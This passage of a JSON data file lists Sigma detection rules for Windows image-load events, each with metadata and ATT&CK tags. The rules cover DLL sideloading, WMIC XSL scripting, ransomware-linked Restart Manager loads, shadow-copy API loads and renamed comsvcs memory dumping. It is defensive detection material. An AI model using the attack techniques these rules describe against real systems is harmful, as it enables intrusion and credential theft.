"e76c8240-d68f-4773-8880-5c6f63595aaf", "value": "Time Travel Debugging Utility Usage - Image" }, { "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-08-17", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_office_dlls.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "value": "Microsoft Office DLL Sideload" }, { "description": "Detects potential DLL sideloading of \"7za.dll\"", "meta": { "author": "X__Junior", "creation_date": "2023-06-09", "falsepositive": [ "Legitimate third party application located in \"AppData\" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed." 
], "filename": "image_load_side_load_7za.yml", "level": "low", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_7za.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f6edb78-5c21-42ab-a558-fd2a6fc1fd57", "value": "Potential 7za.DLL Sideloading" }, { "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-17", "falsepositive": [ "The command wmic os get lastboottuptime loads vbscript.dll", "The command wmic os get locale loads vbscript.dll", "Since the ImageLoad event doesn't have enough information in this case. 
It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" ], "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", "https://twitter.com/dez_/status/986614411711442944", "https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" ], "tags": [ "attack.defense-evasion", "attack.t1220" ] }, "related": [ { "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", "value": "WMIC Loading Scripting Libraries" }, { "description": "Detects potential DLL sideloading of \"vivaldi_elf.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-08-03", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_vivaldi_elf.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vivaldi_elf.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"2092cacb-d77b-4f98-ab0d-32b32f99a054", "value": "Potential Vivaldi_elf.DLL Sideloading" }, { "description": "Detects Kerberos DLL being loaded by an Office Product", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Unknown" ], "filename": "image_load_office_kerberos_dll_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_kerberos_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", "value": "Active Directory Kerberos DLL Loaded Via Office Application" }, { "description": "Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories).\nUsually this technique is used to achieve UAC bypass or privilege escalation.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), SBousseaden", "creation_date": "2022-12-09", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_non_existent_dlls.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", "https://github.com/Wh04m1001/SysmonEoP", "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b98b92b-4f00-4f62-b4fe-4d1920215771", "value": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders" }, { "description": "Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.\nThis library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.\nIt could also be used for anti-analysis purposes by shut downing specific processes.\n", "meta": { "author": "Luc Génaux", "creation_date": "2023-11-28", "falsepositive": [ "Other legitimate Windows processes not currently listed", "Processes related to software installation" ], "filename": "image_load_dll_rstrtmgr_uncommon_load.yml", "level": "low", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/windows-restart-manager-part-1/", "https://www.crowdstrike.com/blog/windows-restart-manager-part-2/", "https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/", "https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_rstrtmgr_uncommon_load.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1486", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3669afd2-9891-4534-a626-e5cf03810a61", "value": "Load Of RstrtMgr.DLL By An Uncommon Process" }, { "description": "Detects any GAC DLL being loaded by an Office Product", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Legitimate macro usage. Add the appropriate filter according to your environment" ], "filename": "image_load_office_dotnet_gac_dll_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_gac_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", "value": "GAC DLL Loaded Via Office Applications" }, { "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) 
loads a DLL from a suspicious location or a location with permissive permissions such as \"C:\\Users\\Public\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-17", "falsepositive": [ "Unknown" ], "filename": "image_load_susp_dll_load_system_process.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "value": "DLL Load By System Process From Suspicious Locations" }, { "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. 
This could be an indication of potential suspicious execution.", "meta": { "author": "omkar72, oscd.community", "creation_date": "2020-10-14", "falsepositive": [ "Unknown" ], "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://thewover.github.io/Introducing-Donut/", "https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://github.com/tyranid/DotNetToJScript", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", "value": "DotNet CLR DLL Loaded By Scripting Applications" }, { "description": "Detects potential DLL sideloading of \"SmadHook.dll\", a DLL used by SmadAV antivirus", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-01", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_smadhook.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.qurium.org/alerts/targeted-malware-against-crph/", "https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_smadhook.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24b6cf51-6122-469e-861a-22974e9c1e5b", "value": "Potential SmadHook.DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"MpSvc.dll\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema", "creation_date": "2024-07-11", "falsepositive": [ "Legitimate applications loading their own versions of the DLL mentioned in this rule." ], "filename": "image_load_side_load_mpsvc.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/entries/microsoft/built-in/mpsvc.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mpsvc.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5ba243e5-8165-4cf7-8c69-e1d3669654c1", "value": "Potential DLL Sideloading Of MpSvc.DLL" }, { "description": "Detects potential DLL sideloading of \"mscorsvc.dll\".", "meta": { "author": "Wietze Beukema", "creation_date": "2024-07-11", "falsepositive": [ "Legitimate applications loading their own versions of the DLL mentioned in this rule." 
], "filename": "image_load_side_load_mscorsvc.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/entries/microsoft/built-in/mscorsvc.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mscorsvc.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cdb15e19-c2d0-432a-928e-e49c8c60dcf2", "value": "Potential DLL Sideloading Of MsCorSvc.DLL" }, { "description": "Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-11", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_abused_dlls_susp_paths.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/", "https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_abused_dlls_susp_paths.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "799a5f48-0ac1-4e0f-9152-71d137d48c2a", "value": "Abusable DLL Potential Sideloading From Suspicious Location" }, { "description": "Detects the image load of VSS DLL by uncommon executables", "meta": { "author": "frack113", "creation_date": "2022-10-31", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_vssapi_susp_load.yml", "level": "high", 
"logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/ORCx41/DeleteShadowCopies", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vssapi_susp_load.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "value": "Suspicious Volume Shadow Copy Vssapi.dll Load" }, { "description": "Detects potential DLL sideloading of \"dbghelp.dll\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-10-25", "falsepositive": [ "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "filename": "image_load_side_load_dbghelp.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", "value": "Potential DLL Sideloading Of DBGHELP.DLL" }, { "description": "Detects potential DLL sideloading of \"waveedit.dll\", which is part of the Nero WaveEditor audio editing software.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-14", "falsepositive": [ "Unlikely" ], 
"filename": "image_load_side_load_waveedit.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_waveedit.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb", "value": "Potential Waveedit.DLL Sideloading" }, { "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", "meta": { "author": "frack113", "creation_date": "2022-12-14", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_jsschhlp.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/", "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "value": "Potential DLL Sideloading Via JsSchHlp" }, { "description": "Detects potential DLL side loading of \"KeyScramblerIE.dll\" by \"KeyScrambler.exe\".\nVarious threat actors and malware have been found side loading a masqueraded \"KeyScramblerIE.dll\" through \"KeyScrambler.exe\".\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-04-15", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_keyscrambler.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/", "https://bazaar.abuse.ch/sample/5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831/", "https://twitter.com/DTCERT/status/1712785426895839339", "https://twitter.com/Max_Mal_/status/1775222576639291859", "https://thehackernews.com/2024/03/two-chinese-apt-groups-ramp-up-cyber.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_keyscrambler.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2451be2-b582-4e15-8701-4196ac180260", "value": "Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE" }, { "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open 
Threat Research)", "creation_date": "2020-06-24", "falsepositive": [ "Unknown" ], "filename": "image_load_wsman_provider_image_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/bohops/WSMan-WinRM", "https://twitter.com/chadtilbury/status/1275851297770610688", "https://learn.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.lateral-movement", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", "value": "Suspicious WSMAN Provider Image Loads" }, { "description": "Detects potential DLL sideloading of \"mfdetours.dll\". 
While using \"mftrace.exe\" it can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-03", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_mfdetours.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mfdetours.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2605a99-2218-4894-8fd3-2afb7946514d", "value": "Potential Mfdetours.DLL Sideloading" }, { "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Unlikely" ], "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1555200155351228419", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" ], "tags": [ "attack.credential-access", "attack.defense-evasion", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"8cde342c-ba48-4b74-b615-172c330f2e93", "value": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32" }, { "description": "Detects potential DLL sideloading of \"wwlib.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-05-18", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_wwlib.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://securelist.com/apt-luminousmoth/103332/", "https://twitter.com/WhichbufferArda/status/1658829954182774784", "https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_wwlib.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2e01011-5910-4267-9c3b-4149ed5479cf", "value": "Potential WWlib.DLL Sideloading" }, { "description": "Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-05", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_vmmap_dbghelp_signed.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmmap_dbghelp_signed.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", 
"attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98ffaed4-aec2-4e04-9b07-31492fe68b3d", "value": "VMMap Signed Dbghelp.DLL Potential Sideloading" }, { "description": "Detects WMI command line event consumers", "meta": { "author": "Thomas Patzke", "creation_date": "2018-03-07", "falsepositive": [ "Unknown (data set is too small; further testing needed)" ], "filename": "image_load_wmi_persistence_commandline_event_consumer.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" ], "tags": [ "attack.t1546.003", "attack.persistence" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", "value": "WMI Persistence - Command Line Event Consumer" }, { "description": "Detects potential DLL sideloading of \"RjvPlatform.dll\" by \"SystemResetPlatform.exe\" located in a non-default location.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-09", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_rjvplatform_non_default_location.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1666716511988330499", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rjvplatform_non_default_location.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0e0bc253-07ed-43f1-816d-e1b220fe8971", "value": "Potential RjvPlatform.DLL Sideloading From Non-Default Location" }, { "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-08-17", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_third_party.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", "value": "Third Party Software DLL Sideloading" }, { "description": "Detect usage of the \"coregen.exe\" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.", 